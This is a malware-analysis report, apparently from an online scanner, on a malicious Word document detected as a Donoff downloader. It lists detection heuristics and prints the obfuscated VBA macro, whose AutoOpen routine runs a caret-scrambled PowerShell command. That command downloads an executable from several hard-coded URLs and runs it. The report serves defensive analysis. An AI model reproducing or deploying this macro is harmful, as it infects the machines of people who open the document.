MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function to execute a command, likely to download and run a second-stage payload. The ClamAV detection 'Doc.Downloader.Donoff-6691329-0' further supports its role as a downloader.
Heuristics 6
-
ClamAV: Doc.Downloader.Donoff-6691329-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Donoff-6691329-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4973 bytes |
SHA-256: 44c14b5d4d26b53c47b1044ff51224e3d261f21a289b8d163442dba7eb674abe |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "lHqtzFhEFiwAt"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Set Ykcpi = LwmXI
Set AMHfNb = KrOuRl
Set AZXWc = WiTsi
Set bwdAzV = kOPzmz
Set iYzTC = NzlATd
Set njKTPQ = QQmaS
Shell ITDFuC + avuhKNvqPR + WflcjPVF + vvdubJNVMPf + XqHqMlUh + wNzszfrMwb, Format(0)
Set SkQFRH = tkiDs
Set LnSBT = OwSCU
Set GjFSi = jXXZHT
End Sub
Attribute VB_Name = "DkNKEipUEt"
Function ITDFuC()
On _
Error _
Resume _
Next
Set rWvJf = YWZswB
Set zJIzQP = wLvdJ
ZJGzXQjTwi = Format(Chr(13 + 6 + 18 + 4 + 58)) + "md " + "/V^:" + "^O" + "/" + Format(Chr(9 + 4 + 12 + 2 + 40)) + Format(Chr(4 + 1 + 5 + 1 + 23)) + "^s^" + "e" + "^t ^jU^"
Set phXXRO = FwpvLW
LfzIU = "8n=^ ^" + " ^ ^ " + " ^ " + " " + "^ ^ ^"
Set UUpOcj = DabbkP
iupwMQCuKQ = " ^ " + "}^}{" + "^" + "h" + Format(Chr(13 + 6 + 18 + 4 + 58)) + "^t^a" + Format(Chr(13 + 6 + 18 + 4 + 58)) + "^}"
Set BVbNdj = PGFkU
Set sNWNF = BJQRwU
Set mqqzZi = Ifkai
TMfpi = ";^" + "k" + "a^" + "e" + "rb^;Fv" + "K$^" + " " + "^m^e" + "^t^I-" + "^e^k^" + "ovnI"
Set QckpM = abwuB
Set KncTvZ = JCXiA
wkLPR = "^;)^Fv" + "^K$^ " + ",Jl" + "^I$(el" + "i^" + "Fda^o" + "^" + "lnwo^" + "D."
ITDFuC = ZJGzXQjTwi + LfzIU + iupwMQCuKQ + TMfpi + wkLPR
Set kovqt = YDUVqa
Set NiqRm = EKTiw
Set ZrhpCP = psGJX
Set CHXuLi = iQjPOX
Set rmvNjR = SIAAQj
Set hSkjQS = bVULL
End Function
Function avuhKNvqPR()
On _
Error _
Resume _
Next
Set PppiSY = zQzTt
ZmONEusS = "^S" + "^zv" + "^${yr" + "^t{)z^" + "B" + "i$ n^"
Set DPPPwj = tafFZ
Set aiPah = qzJws
fZjkKdhuXc = "i^" + " ^Jl" + "^" + "I$(h" + Format(Chr(13 + 6 + 18 + 4 + 58)) + "^" + "aer^" + "o^f;" + "^'^ex^e" + ".'^+Q"
Set jlaaRt = kEwSX
Set rwsCf = szhovr
Set zKBZr = ILDpSw
cbLczOmTX = "^Q^i" + "$+" + "^'^" + "\" + "'+" + Format(Chr(13 + 6 + 18 + 4 + 58)) + "^i" + "^" + "lb" + "u^p:" + "vn^e^$^" + "=Fv" + "^K$" + "^;" + "'"
Set kIfsAW = VAvhUi
Set aAscDu = fwqWMG
Set TikCd = ZvPGFf
VzKXAH = "^68^7^'" + " =" + " ^QQ^i" + "$" + ";)'@"
Set jWZLur = ncDQz
Set PCRHF = TSPKn
fnLGFnWPcB = "'(t" + "i" + "lp^S^." + "'^bd^i" + "/^u" + "r.n^" + "ola^s^u" + "ra" + "^"
avuhKNvqPR = ZmONEusS + fZjkKdhuXc + cbLczOmTX + VzKXAH + fnLGFnWPcB
Set mvrkm = jfDafw
End Function
Function WflcjPVF()
On _
Error _
Resume _
Next
Set AHuwDj = TDsNA
Set rpRjO = htkLMj
Set lOuWX = Maiiz
DYofWXX = "p//^" + ":^p" + "tt^h@M" + "R" + "h" + "^FO^Qa" + "R/^zi^b" + "^.^a^k"
Set HYZws = CSlwzk
swozWraQEv = "o^oo/" + "/:^ptt" + "^h@5" + "^l^" + "k/rb" + ".^m^o" + Format(Chr(13 + 6 + 18 + 4 + 58)) + "." + "e^tro" + "^p^"
Set IipLuc = VwQJiM
Set QAjbS = iTOHK
Set YTOBLI = QqJjl
Set dwZnF = oKKjUt
qMhoklWvUX = "u^" + "stn" + "//:p^tt" + "h^@0" + "/m^"
Set RTkwqf = hEbIm
Set QMhZa = kYwPp
Set jKbDQ = VIrEXF
Set Grtps = RVbwm
Set wIiXb = FEcdzD
RHzsEjDhn = "o" + Format(Chr(13 + 6 + 18 + 4 + 58)) + "^" + ".^" + "pma^t^" + "s" + "d" + "^aors^s" + "or" + Format(Chr(13 + 6 + 18 + 4 + 58)) + "//^:" + "^ptt^h"
Set DOpvl = RBvnJ
Set iiWhhT = MSzut
Set cjZlW = sVsmE
siiPSLPwi = "@^k/^m^" + "o" + Format(Chr(13 + 6 + 18 + 4 + 58)) + "^.pue" + "^" + "kam^" + "e" + "r^o^o" + "m" + "//" + ":p" + "tt" + "h'^" + "="
Set hmiYO = cjtOX
Set wIEVqE = ophKW
Set iKbkq = vTsrRS
imjBtXZUro = "z" + "B^i^$" + "^;tnei^" + "l" + Format(Chr(9 + 4 + 12 + 2 + 40)) + "be" + "^" + "W^.t^eN" + "^" + " " + "^t" + Format(Chr(13 + 6 + 18 + 4 + 58)) + "^" + "e" + "j" + "bo^-w"
Set qwLhV = OzTlhC
Set qraAkW = GEjpqz
Set RFAFnp = nWuBu
LrYCHCY = "^en=S^" + "zv" + "^$" + " ^l^l^e" + "^" + "h" + "^sre^wo" + "p" + "&"
Set HPCTzL = bpkLcO
Set AuvBc = THhjK
HrfCMELzSn = "&^f^o" + "r /^L %" + "^x ^" + "in (^3" + "^40," + "^-^" + "1^,^0" + ")^" + "d" + "^" + "o s^e" +
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.